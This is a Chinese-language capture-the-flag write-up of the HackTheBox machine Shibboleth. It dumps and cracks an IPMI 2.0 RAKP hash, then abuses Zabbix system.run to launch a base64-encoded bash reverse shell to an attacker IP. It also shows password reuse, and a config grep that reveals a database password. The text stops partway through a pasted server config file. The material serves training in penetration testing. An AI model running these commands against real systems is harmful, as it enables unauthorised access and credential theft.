Shibboleth-htb-writeup

0x00 靶场技能介绍

章节技能：VHOSTS子域名枚举、IPMI 服务探测、IPMI 2.0 RAKP认证远程密码哈希检索、hash破解、Zabbix命令执行、CVE-2021-27928

参考链接：https://0xdf.gitlab.io/2022/04/02/htb-shibboleth.html

参考链接：https://0xstarlight.github.io/posts/HTB-Shibboleth/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.124

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop/tools/htb-portscan]
└─$ sudo ./htb-portscan.sh 10.10.11.124 tcp
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)

┌──(kali㉿offsec)-[~/Desktop/tools/htb-portscan]
└─$ sudo ./htb-portscan.sh 10.10.11.124 udp
PORT    STATE SERVICE
623/udp open  asf-rmcp

3、根据发现的域名情况，本地做一下绑定

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.124 shibboleth.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.124 shibboleth.htb

4、这里做一下VHOSTS扫描，看看是否新的子域名情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://shibboleth.htb -H 'Host: FUZZ.shibboleth.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fl 10

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shibboleth.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.shibboleth.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response lines: 10
________________________________________________

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 345ms]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 331ms]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30, Duration: 334ms]
:: Progress: [4989/4989] :: Job [1/1] :: 17 req/sec :: Duration: [0:01:47] :: Errors: 11 ::

5、那就本地绑定下这3个子域名情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.124 monitor.shibboleth.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.124 monitor.shibboleth.htb

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.124 monitoring.shibboleth.htb" | sudo tee -a /etc/hosts
10.10.11.124 monitoring.shibboleth.htb

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.124 zabbix.shibboleth.htb" | sudo tee -a /etc/hosts
10.10.11.124 zabbix.shibboleth.htb

6、这里查看下域名显示内容

http://shibboleth.htb

http://zabbix.shibboleth.htb

7、上面3个子域名的站点都是显示的同一个WEB页面，ZABBIX 的一个功能页面

8、经过检索，暂时没发现啥问题，那就谷歌发现下 udp 服务是什么情况吧，通过端口搜索，发现是一个 IPMI 服务

https://book.hacktricks.xyz/v/cn/network-services-pentesting/623-udp-ipmi

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -sU --script ipmi-version -p 632 10.10.11.124
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-28 19:39 CST
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.33s latency).

PORT    STATE         SERVICE
632/udp open|filtered bmpp

Nmap done: 1 IP address (1 host up) scanned in 3.83 seconds

9、这里使用nmap 并没有发现具体的版本信息，这里使用另一个方法，msf里的插件进行检索

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfconsole 
msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options

Module options (auxiliary/scanner/ipmi/ipmi_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 10.10.11.124
RHOSTS => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_version) > run

[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)
[+] 10.10.11.124:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ipmi/ipmi_version) > 

10、漏洞 - IPMI 2.0 RAKP认证远程密码哈希检索，在上面的那个链接里说这个版本存在这样的一个漏洞，下面使用msf尝试下

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfconsole

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.10.11.124
rhosts => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting                            Required  Description
   ----                  ---------------                            --------  -----------
   CRACK_COMMON          true                                       yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                              no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                 no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/metasploit-framework/data/word  yes       File containing common passwords for offline cracking, one per line
                         lists/ipmi_passwords.txt
   RHOSTS                10.10.11.124                               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
                                                                              asics/using-metasploit.html
   RPORT                 623                                        yes       The target port
   SESSION_MAX_ATTEMPTS  5                                          yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                          yes       Delay between session retries in seconds
   THREADS               1                                          yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/data/word  yes       File containing usernames, one per line
                         lists/ipmi_users.txt


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > cat /opt/metasploit-framework/embedded/framework/data/wordlists/ipmi_users.txt
[*] exec: cat /opt/metasploit-framework/embedded/framework/data/wordlists/ipmi_users.txt

cat: /opt/metasploit-framework/embedded/framework/data/wordlists/ipmi_users.txt: 没有那个文件或目录
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > cat /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt
[*] exec: cat /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt

ADMIN
admin
root
Administrator
USERID
guest
Admin
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:bc95ab018c040000b3a2d778c15beea3f523c5b70182737c056c72944db26b79e368d2c6a3764ee5a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:605eb1a70d5d1f46b73ee0e3e728f082610acbd2
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > 

11、这里发现了hash的数值，我们本地保存下

┌──(kali㉿offsec)-[~/Desktop]
└─$ touch hash   

┌──(kali㉿offsec)-[~/Desktop]
└─$ vim hash      

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat hash        
bc95ab018c040000b3a2d778c15beea3f523c5b70182737c056c72944db26b79e368d2c6a3764ee5a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:605eb1a70d5d1f46b73ee0e3e728f082610acbd2

12、我们根据关键词，搜索下这个是什么加密

7300 IPMI2 RAKP HMAC-SHA1

13、这里使用hashcat进行破解下

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 7300 hash /usr/share/wordlists/rockyou.txt  
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

bc95ab018c040000b3a2d778c15beea3f523c5b70182737c056c72944db26b79e368d2c6a3764ee5a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:605eb1a70d5d1f46b73ee0e3e728f082610acbd2:ilovepumkinpie1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7300 (IPMI2 RAKP HMAC-SHA1)
Hash.Target......: bc95ab018c040000b3a2d778c15beea3f523c5b70182737c056...0acbd2
Time.Started.....: Sun Jan 28 20:42:16 2024 (2 secs)
Time.Estimated...: Sun Jan 28 20:42:18 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4410.9 kH/s (0.13ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7395328/14344385 (51.56%)
Rejected.........: 0/7395328 (0.00%)
Restore.Point....: 7394304/14344385 (51.55%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ilovequay -> ilovepaul0
Hardware.Mon.#1..: Util: 68%

Started: Sun Jan 28 20:42:07 2024
Stopped: Sun Jan 28 20:42:18 2024

14、这里我们就获取到了账号密码信息，经过各种尝试，发现这个是那个 zabbix 网站上的账号密码

Administrator:ilovepumkinpie1

http://zabbix.shibboleth.htb/

http://zabbix.shibboleth.htb/zabbix.php?action=dashboard.view

15、经过翻阅官方文档，发现这个是可以在系统里进行命令执行的

https://www.zabbix.com/documentation/5.0/zh/manual/appendix/command_execution?hl=system.run

Zabbix常用功能包含外部检查、用户参数、system.run监控项、自定义告警脚本、远程命令和用户命令。

16、这里直接参考演练报告进行获取初始权限：导航到以下 –> Configurations > Host > Items > 创建项目

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "bash  -i >& /dev/tcp/10.10.14.6/443 0>&1 " | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNi80NDMgMD4mMSAK

system.run[echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNi80NDMgMD4mMSAK | base64 -d | bash]

http://zabbix.shibboleth.htb/items.php?filter_set=1&filter_hostids%5B0%5D=10084

http://zabbix.shibboleth.htb/items.php?form=create&hostid=10084

17、这里我们也就成功的获取到了反弹的shell内容

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.124] 53686
bash: cannot set terminal process group (30745): Inappropriate ioctl for device
bash: no job control in this shell
zabbix@shibboleth:/$ exit

18、这里发信几秒后就会自动输出退出按钮，在Zabbix Agent文档页面上，该 system.run 部分提供了其工作原理的一些详细信息：它需要一个命令和一个可选的 wait or nowait .使用 nowait ，它返回 1 并且不等待执行完成。

https://www.zabbix.com/documentation/5.0/en/manual/config/items/itemtypes/zabbix_agent

19、我会将我的密钥更新为：

system.run[echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNi80NDMgMD4mMSAK | base64 -d | bash, nowait]

20、我们就成功的获取到持久的shell环境

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443      
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.124] 54302
id
bash: cannot set terminal process group (927): Inappropriate ioctl for device
bash: no job control in this shell
zabbix@shibboleth:/$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)

21、这里构造下完整的shell环境

zabbix@shibboleth:/$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash: python: command not found
zabbix@shibboleth:/$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
zabbix@shibboleth:/$ ^Z
zsh: suspended  nc -lvnp 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 443
                              reset
reset: unknown terminal type unknown
Terminal type? screen
zabbix@shibboleth:/$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)
zabbix@shibboleth:/$ 

22、这个时候就获取到了一个完整的shell环境了

23、查看下用户目录情况

zabbix@shibboleth:/$ ls -la /home
total 12
drwxr-xr-x  3 root     root     4096 Oct 16  2021 .
drwxr-xr-x 19 root     root     4096 Oct 16  2021 ..
drwxr-xr-x  3 ipmi-svc ipmi-svc 4096 Oct 16  2021 ipmi-svc
zabbix@shibboleth:/$ cd /home/ipmi-svc
zabbix@shibboleth:/home/ipmi-svc$ ls -la
total 32
drwxr-xr-x 3 ipmi-svc ipmi-svc 4096 Oct 16  2021 .
drwxr-xr-x 3 root     root     4096 Oct 16  2021 ..
lrwxrwxrwx 1 ipmi-svc ipmi-svc    9 Apr 27  2021 .bash_history -> /dev/null
-rw-r--r-- 1 ipmi-svc ipmi-svc  220 Apr 24  2021 .bash_logout
-rw-r--r-- 1 ipmi-svc ipmi-svc 3771 Apr 24  2021 .bashrc
drwx------ 2 ipmi-svc ipmi-svc 4096 Apr 27  2021 .cache
lrwxrwxrwx 1 ipmi-svc ipmi-svc    9 Apr 28  2021 .mysql_history -> /dev/null
-rw-r--r-- 1 ipmi-svc ipmi-svc  807 Apr 24  2021 .profile
-rw-r----- 1 ipmi-svc ipmi-svc   33 Jan 28 10:02 user.txt
-rw-rw-r-- 1 ipmi-svc ipmi-svc   22 Apr 24  2021 .vimrc
zabbix@shibboleth:/home/ipmi-svc$ 

24、检查密码是否重用， ilovepumkinpie1 密码适用于 ipmi-svc：

zabbix@shibboleth:/home/ipmi-svc$ 
zabbix@shibboleth:/home/ipmi-svc$ su ipmi-svc
Password: 
ipmi-svc@shibboleth:~$ id
uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)
ipmi-svc@shibboleth:~$ ls
user.txt
ipmi-svc@shibboleth:~$ cat user.txt
ed1ea6cfcaafe10b7bd65507f41215f3
ipmi-svc@shibboleth:~$ 

25、这里就获取到了用户flag信息了

0x02 系统权限获取

26、查找下网站目录下，是否有密码的配置文件

ipmi-svc@shibboleth:~$ 
ipmi-svc@shibboleth:~$ grep -iR 'password' /etc/zabbix/ 2>/dev/null
/etc/zabbix/zabbix_server.conf.dpkg-dist:### Option: DBPassword
/etc/zabbix/zabbix_server.conf.dpkg-dist:#      Database password.
/etc/zabbix/zabbix_server.conf.dpkg-dist:#      Comment this line if no password is used.
/etc/zabbix/zabbix_server.conf.dpkg-dist:# DBPassword=
/etc/zabbix/zabbix_server.conf:### Option: DBPassword
/etc/zabbix/zabbix_server.conf:#        Database password.
/etc/zabbix/zabbix_server.conf:#        Comment this line if no password is used.
/etc/zabbix/zabbix_server.conf:DBPassword=bloooarskybluh
ipmi-svc@shibboleth:~$ 

27、那就查看下这个配置文件吧

ipmi-svc@shibboleth:~$ 
ipmi-svc@shibboleth:~$ cat /etc/zabbix/zabbix_server.conf
# This is a configuration file for Zabbix server daemon
# To get more information about Zabbix, visit http://www.zabbix.com

############ GENERAL PARAMETERS #################

### Option: ListenPort
#       Listen port for trapper.
#
# Mandatory: no
# Range: 1024-32767
# Default:
# ListenPort=10051

### Option: SourceIP
#       Source IP address for outgoing connections.
#
# Mandatory: no
# Default:
# SourceIP=

### Option: LogType
#       Specifies where log messages are written to:
#               system  - syslog
#               file    - file specified with LogFile parameter
#               console - standard output
#
# Mandatory: no
# Default:
# LogType=file

### Option: LogFile
#       Log file name for LogType 'file' parameter.
#
# Mandatory: yes, if LogType is set to file, otherwise no
# Default:
# LogFile=

LogFile=/var/log/zabbix/zabbix_server.log

### Option: LogFileSize
#       Maximum size of log file in MB.
#       0 - disable automatic log rotation.
#
# Mandatory: no
# Range: 0-1024
# Default:
# LogFileSize=1

LogFileSize=0

### Option: DebugLevel
#       Specifies debug level:
#       0 - basic information about starting and stopping of Zabbix processes
#       1 - critical information
#       2 - error information
#       3 - warnings
#       4 - for debugging (produces lots of information)
#       5 - extended debugging (produces even more information)
#
# Mandatory: no
# Range: 0-5
# Default:
# DebugLevel=3

### Option: PidFile
#       Name of PID file.
#
# Mandatory: no
# Default:
# PidFile=/tmp/zabbix_server.pid

PidFile=/run/zabbix/zabbix_server.pid

### Option: SocketDir
#       IPC socket directory.
#               Directory to store IPC sockets used by internal Zabbix services.
#
# Mandatory: no
# Default:
# SocketDir=/tmp

SocketDir=/run/zabbix

### Option: DBHost
#       Database host name.
#       If set to localhost, socket is used for MySQL.
#       If set to empty string, socket is used for PostgreSQL.
#
# Mandatory: no
# Default:
# DBHost=localhost

### Option: DBName
#       Database name.
#
# Mandatory: yes
# Default:
# DBName=

DBName=zabbix

### Option: DBSchema
#       Schema name. Used for PostgreSQL.
#
# Mandatory: no
# Default:
# DBSchema=

### Option: DBUser
#       Database user.
#
# Mandatory: no
# Default:
# DBUser=

DBUser=zabbix

### Option: DBPassword
#       Database password.
#       Comment this line if no password is used.
#
# Mandatory: no
# Default:
DBPassword=bloooarskybluh

### Option: DBSocket
#       Path to MySQL socket.
#
# Mandatory: no
# Default:
# DBSocket=

### Option: DBPort
#       Database port when not using local socket.
#
# Mandatory: no
# Range: 1024-65535
# Default:
# DBPort=

### Option: HistoryStorageURL
#       History storage HTTP[S] URL.
#
# Mandatory: no
# Default:
# HistoryStorageURL=

### Option: HistoryStorageTypes
#       Comma separated list of value types to be sent to the history storage.
#
# Mandatory: no
# Default:
# HistoryStorageTypes=uint,dbl,str,log,text

### Option: HistoryStorageDateIndex
#       Enable preprocessing of history values in history storage to store values in different indices based on date.
#       0 - disable
#       1 - enable
#
# Mandatory: no
# Default:
# HistoryStorageDateIndex=0

### Option: ExportDir
#       Directory for real time export of events, history and trends in newline delimited JSON format.
#       If set, enables real time export.
#
# Mandatory: no
# Default:
# ExportDir=

### Option: ExportFileSize
#       Maximum size per export file in bytes.
#       Only used for rotation if ExportDir is set.
#
# Mandatory: no
# Range: 1M-1G
# Default:
# ExportFileSize=1G

### Option: ExportType
#       List of comma delimited types of real time export - allows to control export entities by their
#       type (events, history, trends) individually.
#       Valid only if ExportDir is set.
#
# Mandatory: no
# Default:
# ExportType=events,history,trends

############ ADVANCED PARAMETERS ################

### Option: StartPollers
#       Number of pre-forked instances of pollers.
#
# Mandatory: no
# Range: 0-1000
# Default:
# StartPollers=5

### Option: StartIPMIPollers
#       Number of pre-forked instances of IPMI pollers.
#               The IPMI manager process is automatically started when at least one IPMI poller is started.
#
# Mandatory: no
# Range: 0-1000
# Default:
# StartIPMIPollers=0

### Option: StartPreprocessors
#       Number of pre-forked instances of preprocessing workers.
#               The preprocessing manager process is automatically started when preprocessor worker is started.
#
# Mandatory: no
# Range: 1-1000
# Default:
# StartPreprocessors=3

### Option: StartPollersUnreachable
#       Number of pre-forked instances of pollers for unreachable hosts (including IPMI and Java).
#       At least one poller for unreachable hosts must be running if regular, IPMI or Java pollers
#       are started.
#
# Mandatory: no
# Range: 0-1000
# Default:
# StartPollersUnreachable=1

### Option: StartTrappers
#       Number of pre-forked instances of trappers.
#       Trappers accept incoming connections from Zabbix sender, active agents and active proxies.
#       At least one trapper process must be running to display server availability and view queue
#       in the frontend.
#
# Mandatory: no
# Range: 0-1000
# Default:
# StartTrappers=5

### Option: StartPingers
#       Number of pre-forked instances of ICMP pingers.
#
# Mandatory: no
# Range: 0-1000
# Default:
# StartPingers=1

### Option: StartDiscoverers
#       Number of pre-forked instances of discoverers.
#
# Mandatory: no
# Range: 0-250
# Default:
# StartDiscoverers=1

### Option: StartHTTPPollers
#       Number of pre-forked instances of HTTP pollers.
#
# Mandatory: no
# Range: 0-1000
# Default:
# StartHTTPPollers=1

### Option: StartTimers
#       Number of pre-forked instances of timers.
#       Timers process maintenance periods.
#       Only the first timer process handles host maintenance updates. Problem suppression updates are shared
#       between all timers.
#
# Mandatory: no
# Range: 1-1000
# Default:
# StartTimers=1

### Option: StartEscalators
#       Number of pre-forked instances of escalators.
#
# Mandatory: no
# Range: 0-100
# Default:
# StartEscalators=1

### Option: StartAlerters
#       Number of pre-forked instances of alerters.
#       Alerters send the notifications created by action operations.
#
# Mandatory: no
# Range: 0-100
# Default:
# StartAlerters=3

### Option: JavaGateway
#       IP address (or hostname) of Zabbix Java gateway.
#       Only required if Java pollers are started.
#
# Mandatory: no
# Default:
# JavaGateway=

### Option: JavaGatewayPort
#       Port that Zabbix Java gateway listens on.
#
# Mandatory: no
# Range: 1024-32767
# Default:
# JavaGatewayPort=10052

### Option: StartJavaPollers
#       Number of pre-forked instances of Java pollers.
#
# Mandatory: no
# Range: 0-1000
# Default:
# StartJavaPollers=0

### Option: StartVMwareCollectors
#       Number of pre-forked vmware collector instances.
#
# Mandatory: no
# Range: 0-250
# Default:
# StartVMwareCollectors=0

### Option: VMwareFrequency
#       How often Zabbix will connect to VMware service to obtain a new data.
#
# Mandatory: no
# Range: 10-86400
# Default:
# VMwareFrequency=60

### Option: VMwarePerfFrequency
#       How often Zabbix will connect to VMware service to obtain performance data.
#
# Mandatory: no
# Range: 10-86400
# Default:
# VMwarePerfFrequency=60

### Option: VMwareCacheSize
#       Size of VMware cache, in bytes.
#       Shared memory size for storing VMware data.
#       Only used if VMware collectors are started.
#
# Mandatory: no
# Range: 256K-2G
# Default:
# VMwareCacheSize=8M

### Option: VMwareTimeout
#       Specifies how many seconds vmware collector waits for response from VMware service.
#
# Mandatory: no
# Range: 1-300
# Default:
# VMwareTimeout=10

### Option: SNMPTrapperFile
#       Temporary file used for passing data from SNMP trap daemon to the server.
#       Must be the same as in zabbix_trap_receiver.pl or SNMPTT configuration file.
#
# Mandatory: no
# Default:
# SNMPTrapperFile=/tmp/zabbix_traps.tmp

SNMPTrapperFile=/var/log/snmptrap/snmptrap.log

### Option: StartSNMPTrapper
#       If 1, SNMP trapper process is started.
#
# Mandatory: no
# Range: 0-1
# Default:
# StartSNMPTrapper=0

### Option: ListenIP
#       List of comma delimited IP addresses that the trapper should listen on.
#       Trapper will listen on all network interfaces if this parameter is missing.
#
# Mandatory: no
# Default:
# ListenIP=0.0.0.0

# ListenIP=127.0.0.1

### Option: HousekeepingFrequency
#       How often Zabbix will perform housekeeping procedure (in hours).
#       Housekeeping is removing outdated information from the database.
#       To prevent Housekeeper from being overloaded, no more than 4 times HousekeepingFrequency
#       hours of outdated information are deleted in one housekeeping cycle, for each item.
#       To lower load on server startup housekeeping is postponed for 30 minutes after server start.
#       With HousekeepingFrequency=0 the housekeeper can be only executed using the runtime control option.
#       In this case the period of outdated information deleted in one housekeeping cycle is 4 times the
#       period since the last housekeeping cycle, but not less than 4 hours and not greater than 4 days.
#
# Mandatory: no
# Range: 0-24
# Default:
# HousekeepingFrequency=1

### Option: MaxHousekeeperDelete
#       The table "housekeeper" contains "tasks" for housekeeping procedure in the format:
#       [housekeeperid], [tablename], [field], [value].
#       No more than 'MaxHousekeeperDelete' rows (corresponding to [tablename], [field], [value])
#       will be deleted per one task in one housekeeping cycle.
#       If set to 0 then no limit is used at all. In this case you must know what you are doing!
#
# Mandatory: no
# Range: 0-1000000
# Default:
# MaxHousekeeperDelete=5000

### Option: CacheSize
#       Size of configuration cache, in bytes.
#       Shared memory size for storing host, item and trigger data.
#
# Mandatory: no
# Range: 128K-64G
# Default:
# CacheSize=8M

### Option: CacheUpdateFrequency
#       How often Zabbix will perform update of configuration cache, in seconds.
#
# Mandatory: no
# Range: 1-3600
# Default:
# CacheUpdateFrequency=60

### Option: StartDBSyncers
#       Number of pre-forked instances of DB Syncers.
#
# Mandatory: no
# Range: 1-100
# Default:
# StartDBSyncers=4

### Option: HistoryCacheSize
#       Size of history cache, in bytes.
#       Shared memory size for storing history data.
#
# Mandatory: no
# Range: 128K-2G
# Default:
# HistoryCacheSize=16M

### Option: HistoryIndexCacheSize
#       Size of history index cache, in bytes.
#       Shared memory size for indexing history cache.
#
# Mandatory: no
# Range: 128K-2G
# Default:
# HistoryIndexCacheSize=4M

### Option: TrendCacheSize
#       Size of trend cache, in bytes.
#       Shared memory size for storing trends data.
#
# Mandatory: no
# Range: 128K-2G
# Default:
# TrendCacheSize=4M

### Option: ValueCacheSize
#       Size of history value cache, in bytes.
#       Shared memory size for caching item history data requests.
#       Setting to 0 disables value cache.
#
# Mandatory: no
# Range: 0,128K-64G
# Default:
# ValueCacheSize=8M

### Option: Timeout
#       Specifies how long we wait for agent, SNMP device or external check (in seconds).
#
# Mandatory: no
# Range: 1-30
# Default:
# Timeout=3

Timeout=4

### Option: TrapperTimeout
#       Specifies how many seconds trapper may spend processing new data.
#
# Mandatory: no
# Range: 1-300
# Default:
# TrapperTimeout=300

### Option: UnreachablePeriod
#       After how many seconds of unreachability treat a host as unavailable.
#
# Mandatory: no
# Range: 1-3600
# Default:
# UnreachablePeriod=45

### Option: UnavailableDelay
#       How often host is checked for availability during the unavailability period, in seconds.
#
# Mandatory: no
# Range: 1-3600
# Default:
# UnavailableDelay=60

### Option: UnreachableDelay
#       How often host is checked for availability during the unreachability period, in seconds.
#
# Mandatory: no
# Range: 1-3600
# Default:
# UnreachableDelay=15

### Option: AlertScriptsPath
#       Full path to location of custom alert scripts.
#       Default depends on compilation options.
#       To see the default path run command "zabbix_server --help".
#
# Mandatory: no
# Default:
# AlertScriptsPath=${datadir}/zabbix/alertscripts

AlertScriptsPath=/usr/lib/zabbix/alertscripts

### Option: ExternalScripts
#       Full path to location of external scripts.
#       Default depends on compilation options.
#       To see the default path run command "zabbix_server --help".
#
# Mandatory: no
# Default:
# ExternalScripts=${datadir}/zabbix/externalscripts

ExternalScripts=/usr/lib/zabbix/externalscripts

### Option: FpingLocation
#       Location of fping.
#       Make sure that fping binary has root ownership and SUID flag set.
#
# Mandatory: no
# Default:
# FpingLocation=/usr/sbin/fping

FpingLocation=/usr/bin/fping

### Option: Fping6Location
#       Location of fping6.
#       Make sure that fping6 binary has root ownership and SUID flag set.
#       Make empty if your fping utility is capable to process IPv6 addresses.
#
# Mandatory: no
# Default:
# Fping6Location=/usr/sbin/fping6

Fping6Location=/usr/bin/fping6

### Option: SSHKeyLocation
#       Location of public and private keys for SSH checks and actions.
#
# Mandatory: no
# Default:
# SSHKeyLocation=

### Option: LogSlowQueries
#       How long a database query may take before being logged (in milliseconds).
#       Only works if DebugLevel set to 3, 4 or 5.
#       0 - don't log slow queries.
#
# Mandatory: no
# Range: 1-3600000
# Default:
# LogSlowQueries=0

LogSlowQueries=3000

### Option: TmpDir
#       Temporary directory.
#
# Mandatory: no
# Default:
# TmpDir=/tmp

### Option: StartProxyPollers
#       Number of pre-forked instances of pollers for passive proxies.
#
# Mandatory: no
# Range: 0-250
# Default:
# StartProxyPollers=1

### Option: ProxyConfigFrequency
#       How often Zabbix Server sends configuration data to a Zabbix Proxy in seconds.
#       This parameter is used only for proxies in the passive mode.
#
# Mandatory: no
# Range: 1-3600*24*7
# Default:
# ProxyConfigFrequency=3600

### Option: ProxyDataFrequency
#       How often Zabbix Server requests history data from a Zabbix Proxy in seconds.
#       This parameter is used only for proxies in the passive mode.
#
# Mandatory: no
# Range: 1-3600
# Default:
# ProxyDataFrequency=1

### Option: StartLLDProcessors
#       Number of pre-forked instances of low level discovery processors.
#
# Mandatory: no
# Range: 1-100
# Default:
# StartLLDProcessors=2

### Option: AllowRoot
#       Allow the server to run as 'root'. If disabled and the server is started by 'root', the server
#       will try to switch to the user specified by the User configuration option instead.
#       Has no effect if started under a regular user.
#       0 - do not allow
#       1 - allow
#
# Mandatory: no
# Default:
# AllowRoot=0

### Option: User
#       Drop privileges to a specific, existing user on the system.
#       Only has effect if run as 'root' and AllowRoot is disabled.
#
# Mandatory: no
# Default:
# User=zabbix

### Option: Include
#       You may include individual files or all files in a directory in the configuration file.
#       Installing Zabbix will create include directory in /usr/local/etc, unless modified during the compile time.
#
# Mandatory: no
# Default:
# Include=

# Include=/usr/local/etc/zabbix_server.general.conf
# Include=/usr/local/etc/zabbix_server.conf.d/
# Include=/usr/local/etc/zabbix_server.conf.d/*.conf

### Option: SSLCertLocation
#       Location of SSL client certificates.
#       This parameter is used only in web monitoring.
#       Default depends on compilation options.
#       To see the default path run command "zabbix_server --help".
#
# Mandatory: no
# Default:
# SSLCertLocation=${datadir}/zabbix/ssl/certs

### Option: SSLKeyLocation
